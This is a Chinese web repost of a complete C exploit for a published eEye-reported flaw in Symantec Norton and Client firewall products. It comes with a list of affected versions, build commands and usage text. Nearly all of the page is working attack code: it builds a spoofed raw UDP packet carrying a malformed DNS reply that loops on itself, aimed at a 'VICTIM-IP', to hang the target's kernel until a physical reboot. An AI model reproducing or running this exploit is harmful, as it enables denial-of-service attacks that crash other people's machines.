分享
 
 
 

赛门铁客防火墙D.o.s攻击代码

王朝other·作者佚名  2006-01-09
窄屏简体版  字體: |||超大  

作者:houseofdabus

名称:HOD-symantec-firewall-DoS-expl.c:

版本:Version 0.1 coded by houseofdabus

翻译:luoluo

漏洞发现:www.eEye.com

漏洞描述:http://www.eeye.com/html/Research/Advisories/AD20040512B.html

* -------------------------------------------------------------------

* 程序测试:

* - Symantec Norton Personal Firewall 2004

* 受影响产品:

* - Symantec Norton Internet Security 2002

* - Symantec Norton Internet Security 2003

* - Symantec Norton Internet Security 2004

* - Symantec Norton Internet Security Professional 2002

* - Symantec Norton Internet Security Professional 2003

* - Symantec Norton Internet Security Professional 2004

* - Symantec Norton Personal Firewall 2002

* - Symantec Norton Personal Firewall 2003

* - Symantec Norton Personal Firewall 2004

* - Symantec Client Firewall 5.01, 5.1.1

* - Symantec Client Security 1.0, 1.1, 2.0(SCF 7.1)

* - Symantec Norton AntiSpam 2004

* -------------------------------------------------------------------

* 说明:

eEye Digital Security 现已发现在 Symantec 防火墙系列产品中存在的第二个安全漏洞,该漏洞可以被远程探测,并被利用来针对受影响系统进行拒绝服务攻击. 通过发送单个恶意 DNS (UDP 端口 53)响应包给存在漏洞的主机, 攻击者可以使 Symantec DNS 响应确认代码在内核中进入死循环,直至系统崩溃。受攻击主机只能通过物理重启,才能恢复运行.

* -------------------------------------------------------------------

* 编译:

* Win32/VC++ : cl -o HOD-sym-DoS-expl HOD-sym-DoS-expl.c ws2_32.lib

* Win32/cygwin: gcc -o HOD-sym-DoS-expl HOD-sym-DoS-expl.c -lws2_32.lib

* Linux : gcc -o HOD-sym-DoS-expl HOD-sym-DoS-expl.c -Wall

* -------------------------------------------------------------------

* 命令行参数/说明:

* HOD-symantec-firewall-DoS-expl [-fi:str] [-tp:int] [-ti:str] [-n:int]

* -fi:IP From (sender) IP address

* -tp:int To (recipient) port number

* -ti:IP To (recipient) IP address

* -n:int Number of times to send message

*

*/

#ifdef _WIN32

#pragma comment(lib,"ws2_32")

#pragma pack(1)

#define WIN32_LEAN_AND_MEAN

#include <winsock2.h>

#include <ws2tcpip.h> /* IP_HDRINCL */

#include <stdio.h>

#include <stdlib.h>

#else

#include <sys/types.h>

#include <netinet/in.h>

#include <sys/socket.h>

#include <stdio.h>

#include <stdlib.h>

#include <arpa/inet.h>

#include <netdb.h>

#include <sys/timeb.h>

#include <string.h>

#endif

#define MAX_MESSAGE 4068

#define MAX_PACKET 4096

#define DEFAULT_PORT 53

#define DEFAULT_IP "10.0.0.1"

#define DEFAULT_COUNT 1

#ifndef _WIN32

# define FAR

#endif

/* Define the DNS header */

char dnsreply[] =

"\xc9\x9c" /* Transaction ID */

"\x80\x00" /* Flags (bit 15: response) */

"\x00\x01" /* Number of questions */

"\x00\x01" /* Number of answer RRs */

"\x00\x00" /* Number of authority RRs */

"\x00\x00" /* Number of additional RRs */

"\xC0\x0C"; /* Compressed name pointer to itself */

/* Define the IP header */

typedef struct ip_hdr {

unsigned char ip_verlen; /* IP version & length */

unsigned char ip_tos; /* IP type of service */

unsigned short ip_totallength; /* Total length */

unsigned short ip_id; /* Unique identifier */

unsigned short ip_offset; /* Fragment offset field */

unsigned char ip_ttl; /* Time to live */

unsigned char ip_protocol; /* Protocol */

unsigned short ip_checksum; /* IP checksum */

unsigned int ip_srcaddr; /* Source address */

unsigned int ip_destaddr; /* Destination address */

} IP_HDR, *PIP_HDR, FAR* LPIP_HDR;

/* Define the UDP header */

typedef struct udp_hdr {

unsigned short src_portno; /* Source port number */

unsigned short dst_portno; /* Destination port number */

unsigned short udp_length; /* UDP packet length */

unsigned short udp_checksum; /* UDP checksum (optional) */

} UDP_HDR, *PUDP_HDR;

/* globals */

unsigned long dwToIP, // IP to send to

dwFromIP; // IP to send from (spoof)

unsigned short iToPort, // Port to send to

iFromPort; // Port to send from (spoof)

unsigned long dwCount; // Number of times to send

char strMessage[MAX_MESSAGE]; // Message to send

void

usage(char *progname) {

printf("Usage:\n\n");

printf("%s <-fi:SRC-IP> <-ti:VICTIM-IP> [-tp:DST-PORT] [-n:int]\n\n", progname);

printf(" -fi:IP From (sender) IP address\n");

printf(" -tp:int To (recipient) open UDP port number:\n");

printf(" 137, 138, 445, 500(default)\n");

printf(" -ti:IP To (recipient) IP address\n");

printf(" -n:int Number of times\n");

exit(1);

}

void

ValidateArgs(int argc, char **argv)

{

int i;

iToPort = 500;

iFromPort = DEFAULT_PORT;

dwToIP = inet_addr(DEFAULT_IP);

dwFromIP = inet_addr(DEFAULT_IP);

dwCount = DEFAULT_COUNT;

memcpy(strMessage, dnsreply, sizeof(dnsreply)-1);

for(i = 1; i < argc; i++) {

if ((argv[i][0] == '-') || (argv[i][0] == '/')) {

switch (tolower(argv[i][1])) {

case 'f':

switch (tolower(argv[i][2])) {

case 'i':

if (strlen(argv[i]) > 4)

dwFromIP = inet_addr(&argv[i][4]);

break;

default:

usage(argv[0]);

break;

}

break;

case 't':

switch (tolower(argv[i][2])) {

case 'p':

if (strlen(argv[i]) > 4)

iToPort = atoi(&argv[i][4]);

break;

case 'i':

if (strlen(argv[i]) > 4)

dwToIP = inet_addr(&argv[i][4]);

break;

default:

usage(argv[0]);

break;

}

break;

case 'n':

if (strlen(argv[i]) > 3)

dwCount = atol(&argv[i][3]);

break;

default:

usage(argv[0]);

break;

}

}

}

return;

}

/* This function calculates the 16-bit one's complement sum */

/* for the supplied buffer */

unsigned short

checksum(unsigned short *buffer, int size)

{

unsigned long cksum=0;

while (size > 1) {

cksum += *buffer++;

size -= sizeof(unsigned short);

}

if (size) {

cksum += *(unsigned char *)buffer;

}

cksum = (cksum >> 16) + (cksum & 0xffff);

cksum += (cksum >>16);

return (unsigned short)(~cksum);

}

int

main(int argc, char **argv)

{

#ifdef _WIN32

WSADATA wsd;

#endif

int s;

#ifdef _WIN32

BOOL bOpt;

#else

int bOpt;

#endif

struct sockaddr_in remote;

IP_HDR ipHdr;

UDP_HDR udpHdr;

int ret;

unsigned long i;

unsigned short iTotalSize,

iUdpSize,

iUdpChecksumSize,

iIPVersion,

iIPSize,

cksum = 0;

char buf[MAX_PACKET],

*ptr = NULL;

#ifdef _WIN32

IN_ADDR addr;

#else

struct sockaddr_in addr;

#endif

printf("\nSymantec Multiple Firewall DNS Response Denial-of-Service exploit v0.1\n");

printf("Bug discoveried by eEye:\n");

printf("http://www.eeye.com/html/Research/Advisories/AD20040512B.html\n\n");

printf("--- Coded by .::[ houseofdabus ]::. ---\n\n");

if (argc < 3) usage(argv[0]);

/* Parse command line arguments and print them out */

ValidateArgs(argc, argv);

#ifdef _WIN32

addr.S_un.S_addr = dwFromIP;

printf("[*] From IP: <%s>, port: %d\n", inet_ntoa(addr), iFromPort);

addr.S_un.S_addr = dwToIP;

printf("[*] To IP: <%s>, port: %d\n", inet_ntoa(addr), iToPort);

printf("[*] Count: %d\n", dwCount);

#else

addr.sin_addr.s_addr = dwFromIP;

printf("[*] From IP: <%s>, port: %d\n", inet_ntoa(addr.sin_addr), iFromPort);

addr.sin_addr.s_addr = dwToIP;

printf("[*] To IP: <%s>, port: %d\n", inet_ntoa(addr.sin_addr), iToPort);

printf("[*] Count: %d\n", dwCount);

#endif

#ifdef _WIN32

if (WSAStartup(MAKEWORD(2,2), &wsd) != 0) {

printf("[-] WSAStartup() failed: %d\n", GetLastError());

return -1;

}

#endif

/* Creating a raw socket */

s = socket(AF_INET, SOCK_RAW, IPPROTO_UDP);

#ifdef _WIN32

if (s == INVALID_SOCKET) {

printf("[-] WSASocket() failed: %d\n", WSAGetLastError());

return -1;

}

#endif

/* Enable the IP header include option */

#ifdef _WIN32

bOpt = TRUE;

#else

bOpt = 1;

#endif

ret = setsockopt(s, IPPROTO_IP, IP_HDRINCL, (char *)&bOpt, sizeof(bOpt));

#ifdef _WIN32

if (ret == SOCKET_ERROR) {

printf("[-] setsockopt(IP_HDRINCL) failed: %d\n", WSAGetLastError());

return -1;

}

#endif

/* Initalize the IP header */

iTotalSize = sizeof(ipHdr) + sizeof(udpHdr) + sizeof(dnsreply)-1;

iIPVersion = 4;

iIPSize = sizeof(ipHdr) / sizeof(unsigned long);

ipHdr.ip_verlen = (iIPVersion << 4) | iIPSize;

ipHdr.ip_tos = 0; /* IP type of service */

ipHdr.ip_totallength = htons(iTotalSize); /* Total packet len */

ipHdr.ip_id = 0; /* Unique identifier: set to 0 */

ipHdr.ip_offset = 0; /* Fragment offset field */

ipHdr.ip_ttl = 128; /* Time to live */

ipHdr.ip_protocol = 0x11; /* Protocol(UDP) */

ipHdr.ip_checksum = 0 ; /* IP checksum */

ipHdr.ip_srcaddr = dwFromIP; /* Source address */

ipHdr.ip_destaddr = dwToIP; /* Destination address */

/* Initalize the UDP header */

iUdpSize = sizeof(udpHdr) + sizeof(dnsreply)-1;

udpHdr.src_portno = htons(iFromPort) ;

udpHdr.dst_portno = htons(iToPort) ;

udpHdr.udp_length = htons(iUdpSize) ;

udpHdr.udp_checksum = 0 ;

iUdpChecksumSize = 0;

ptr = buf;

memset(buf, 0, MAX_PACKET);

memcpy(ptr, &ipHdr.ip_srcaddr, sizeof(ipHdr.ip_srcaddr));

ptr += sizeof(ipHdr.ip_srcaddr);

iUdpChecksumSize += sizeof(ipHdr.ip_srcaddr);

memcpy(ptr, &ipHdr.ip_destaddr, sizeof(ipHdr.ip_destaddr));

ptr += sizeof(ipHdr.ip_destaddr);

iUdpChecksumSize += sizeof(ipHdr.ip_destaddr);

ptr++;

iUdpChecksumSize += 1;

memcpy(ptr, &ipHdr.ip_protocol, sizeof(ipHdr.ip_protocol));

ptr += sizeof(ipHdr.ip_protocol);

iUdpChecksumSize += sizeof(ipHdr.ip_protocol);

memcpy(ptr, &udpHdr.udp_length, sizeof(udpHdr.udp_length));

ptr += sizeof(udpHdr.udp_length);

iUdpChecksumSize += sizeof(udpHdr.udp_length);

memcpy(ptr, &udpHdr, sizeof(udpHdr));

ptr += sizeof(udpHdr);

iUdpChecksumSize += sizeof(udpHdr);

for(i = 0; i < sizeof(dnsreply)-1; i++, ptr++)

*ptr = strMessage[i];

iUdpChecksumSize += sizeof(dnsreply)-1;

cksum = checksum((unsigned short *)buf, iUdpChecksumSize);

udpHdr.udp_checksum = cksum;

memset(buf, 0, MAX_PACKET);

ptr = buf;

memcpy(ptr, &ipHdr, sizeof(ipHdr)); ptr += sizeof(ipHdr);

memcpy(ptr, &udpHdr, sizeof(udpHdr)); ptr += sizeof(udpHdr);

memcpy(ptr, strMessage, sizeof(dnsreply)-1);

remote.sin_family = AF_INET;

remote.sin_port = htons(iToPort);

remote.sin_addr.s_addr = dwToIP;

for(i = 0; i < dwCount; i++) {

#ifdef _WIN32

ret = sendto(s, buf, iTotalSize, 0, (SOCKADDR *)&remote,

sizeof(remote));

if (ret == SOCKET_ERROR) {

printf("[-] sendto() failed: %d\n", WSAGetLastError());

break;

} else

#else

ret = sendto(s, buf, iTotalSize, 0, (struct sockaddr *) &remote,

sizeof(remote));

#endif

printf("[+] sent %d bytes\n", ret);

}

#ifdef _WIN32

closesocket(s);

WSACleanup();

#endif

return 0;

}

 
 
 
免责声明:本文为网络用户发布,其观点仅代表作者个人观点,与本站无关,本站仅提供信息存储服务。文中陈述内容未经本站证实,其真实性、完整性、及时性本站不作任何保证或承诺,请读者仅作参考,并请自行核实相关内容。
2023年上半年GDP全球前十五强
 百态   2023-10-24
美众议院议长启动对拜登的弹劾调查
 百态   2023-09-13
上海、济南、武汉等多地出现不明坠落物
 探索   2023-09-06
印度或要将国名改为“巴拉特”
 百态   2023-09-06
男子为女友送行,买票不登机被捕
 百态   2023-08-20
手机地震预警功能怎么开?
 干货   2023-08-06
女子4年卖2套房花700多万做美容:不但没变美脸,面部还出现变形
 百态   2023-08-04
住户一楼被水淹 还冲来8头猪
 百态   2023-07-31
女子体内爬出大量瓜子状活虫
 百态   2023-07-25
地球连续35年收到神秘规律性信号,网友:不要回答!
 探索   2023-07-21
全球镓价格本周大涨27%
 探索   2023-07-09
钱都流向了那些不缺钱的人,苦都留给了能吃苦的人
 探索   2023-07-02
倩女手游刀客魅者强控制(强混乱强眩晕强睡眠)和对应控制抗性的关系
 百态   2020-08-20
美国5月9日最新疫情:美国确诊人数突破131万
 百态   2020-05-09
荷兰政府宣布将集体辞职
 干货   2020-04-30
倩女幽魂手游师徒任务情义春秋猜成语答案逍遥观:鹏程万里
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案神机营:射石饮羽
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案昆仑山:拔刀相助
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案天工阁:鬼斧神工
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案丝路古道:单枪匹马
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案镇郊荒野:与虎谋皮
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案镇郊荒野:李代桃僵
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案镇郊荒野:指鹿为马
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案金陵:小鸟依人
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案金陵:千金买邻
 干货   2019-11-12
 
推荐阅读
 
 
 
>>返回首頁<<
 
靜靜地坐在廢墟上,四周的荒凉一望無際,忽然覺得,淒涼也很美
© 2005- 王朝網路 版權所有